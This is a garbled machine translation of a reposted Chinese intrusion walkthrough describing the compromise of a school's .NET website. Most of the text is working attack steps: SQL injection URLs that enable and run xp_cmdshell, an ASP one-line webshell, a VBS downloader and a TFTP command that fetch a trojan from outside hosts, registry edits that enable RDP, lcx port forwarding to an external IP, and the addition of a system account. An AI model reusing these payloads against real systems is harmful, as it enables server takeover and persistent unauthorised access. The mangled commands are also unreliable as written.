Infiltration of the Alma Mater. NET Website

Author: Xiaohua [] & [SOVO of Chengdu Neusoft Emy of information] ----- reposted here to describe the source! The cainiao expert does not laugh!

A few days ago, I received a phone call from a high school student saying that the website of the middle school had been revised. I bought an independent server and put the server in the school data center. Of course, the server is located in the Intranet environment. the program is. NET, let me detect the security. First, find the injection point. After tools and manual searches, I found an injection vulnerability in a place, which is good luck! In ah d, the following message is displayed: SA permission 1:

You can only find several system tables in the table, and failed to try the column directory. Run the command in NBSI immediately. Finally, the powerful pangolin is placed for detection, and the command cannot be executed. Check the database version with Pangolin and find that the database is a database of MSSQL2005.

2:


No wonder you cannot execute the command. MSSQL2005 disables xp_mongoshell by default. Now we need to enable it.

Http://www.bkjia.com/xfjshow. aspx? Fj = 6'; EXEC % 20sp_configure % 20'show % 20 advanced % 20option', % 201; RECONFIGURE; EXEC % 20sp_configure % 20 'xp _ blank shell', % 201; RECONFIGURE; --

The returned result is normal, indicating that the function is enabled successfully. The command cannot be displayed when it is run in the same way as the tool. The previous submission when looking for an injection site broke the website path. This path is used. Our idea is to run the command and input the result to a file in the directory where the website is located, and then access the file to see the content! This is also a penetration technique. Let's check which services are enabled on the host and submit them:

Http://www.bkjia.com/xfjshow. aspx? Fj = 6'; EXEC % 20master. dbo. xp_cmdshell % 20 'net start> c: \ inetpub \ wwwroot \ njezwz \ x.txt '; -- return to normal, access http://www.bkjia.com/x.txt. the following figure shows the host-enabled service 3:

You can execute commands !, Now let's take down the WEB server first. We also know the path. First, write a trojan in one sentence.

Http://www.bkjia.com/xfjshow. aspx? Fj = 6'; EXEC % 20master. dbo. xp_cmdshell % 20'echo % 20 ^ <^ % execute % 20 request ("k") % ^> ^ % 20> c: \ inetpub \ wwwroot \ njezwz \ x. asp ';--

The returned result is normal. When a trojan address is accessed, the system prompts "Type Mismatch: 'execute '". It seems that the write operation is normal. Immediately took out a sentence and the trojan Client Connected to the Trojan, prompting that the writing failed. Is it possible to write a trojan in one sentence?

Http://www.xxxxxx.com.cn/xfjshow.aspx? Fj = 6'; EXEC % 20master. dbo. xp_cmdshell % 20 'Type c: \ inetpub \ wwwroot \ njezwz \ updown \ x. asp> c: \ inetpub \ wwwroot \ njezwz \ updown \ x.txt ';--

The written horse is found to be correct. This is probably a permission issue. Change the permission to view the directory immediately.

Http://www.bkjia.com/xfjshow. aspx? Fj = 6'; EXEC % 20master. dbo. xp_cmdshell % 20 'cacls c: \ inetpub \ wwwroot \ njezwz \> c: \ inetpub \ wwwroot \ njezwz \ X. TXT ';--

If you find that the directory has only the read permission, change the permission of the Directory immediately. After adding the write permission, we cannot write data again when using a single sentence client connection.

Depressed .. In the end, you cannot add full control permissions. There are other ways for this road to fail. Let's see if this server can access the Internet, http://www.bkjia.com/xfjshow. aspx? Fj = 6'; EXEC % 20master. dbo. xp_mongoshell % 20 'Ping www.baidu.com> c: \ inetpub \ wwwroot \ njezwz \ x.txt '; -- return normally. Check whether X is returned. TXT content found that the server can access the Internet.


Since we can access the Internet, we can use TFTP to download an ASP Trojan to a more directory on the website.

Http://www.bkjia.com/xfjshow. aspx? Fj = 6'; EXEC % 20master. dbo. xp_cmdshell % 20 'tftp-I 219.140.165.41 get muma. asp c: \ inetpub \ wwwroot \ njezwz \ xx. asp ';--

Looking at the half-day failure of the TFTP server, it seems that the TFTP file is deleted.

Let's write a VBS script to the server and use it to download our Trojan !~ It is best to use a long VBS script, c

An error occurs when the download process is too long. Upload a script Trojan to a space. Note that the trojan format is changed to TXT.

Http://www.XXXXX.com.cn/xfjshow.aspx? Fj = 6'; EXEC % 20master. dbo. xp_cmdshell % 20 'echo Set xPost = CreateObject (^ "Microsoft. XMLHTTP ^ "): xPost. open ^ "GET ^", ^ "http://www.ayzx. SC .cn/msnhack.txt^", 0: xPost. send (): Set sGet = CreateObject (^ "ADODB. stream ^ "): sGet. mode = 3: sGet. type = 1: sGet. open (): sGet. write (xPost. responseBody): sGet. saveToFile ^ "c: \ inetpub \ wwwroot \ njezwz \ SQL. asp ^ ", 2> d: \ z. vbs ';--

Write normally. Now let's execute and download our script Trojan.

Http://www.bkjia.com/xfjshow. aspx? Fj = 6'; EXEC % 20master. dbo. xp_mongoshell % 20 'cscript d: \ z. vbs ';--

The returned result is normal. Access the trojan address to obtain the WEBSHELL. 5:



Now we can seize the server permissions and obtain the SA password by viewing the database connection file. It is much more comfortable to execute the command using xp_mongoshell of this trojan, And the ECHO is also good. Set a data source first. Then run the command to find that there is no port 3389. Run reg query "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server" to find that the value of fDenyTSConnections REG_DWORD 0x1 is 1 and the value of 3389 is disabled. Now we can enable 3389 by changing it to 0.

Reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp"/v PortNumber/t REG_DWORD/d 3389/f

Reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"/v fDenyTSConnections/t REG_DWORD/d 0/f

Reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp"/v PortNumber/t REG_DWORD/d 3389/f

Check the port opening status again and find that 3389 is enabled successfully. Upload an LCX immediately. Use LCX to listen to a port at the zombie end

Broiler: d: \ lcx.exe-listen 51 4000

Infiltrated HOST: C: \ Documents ents and Settings \ All Users \ Documents ents \ lcx.exe-slave 219.140.165.41 51 127.0.0.1 3389

After a while, we added a system account and immediately connected port 4000 to the bot. Enter the account you just added to log on to Server 6: